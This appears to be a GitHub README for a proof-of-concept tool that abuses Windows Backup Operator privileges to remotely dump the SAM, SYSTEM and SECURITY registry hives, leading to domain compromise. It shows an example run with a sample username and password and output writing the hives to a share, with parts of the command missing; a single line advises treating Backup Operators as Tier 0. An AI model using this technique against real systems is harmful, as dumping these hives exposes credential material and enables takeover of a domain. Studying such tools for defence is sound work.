Backup Operator Registry Backup to Domain Compromise

A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY hives.

Research credit to:


This proof of concept is a modified version of impacket/examples/ and will work with the most recent impacket release installed. All supported impacket authentication mechanisms will work.

[email protected]:~# python3 jsmith:'Spring2021'@ backup -p '\\\share'
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

Dumping SAM hive to \\\share\SAM
Dumping SYSTEM hive to \\\share\SYSTEM
Dumping SECURITY hive to \\\share\SECURITY



Treat Backup Operators domain group as Domain Adminstrators and other Tier 0 resources


View Github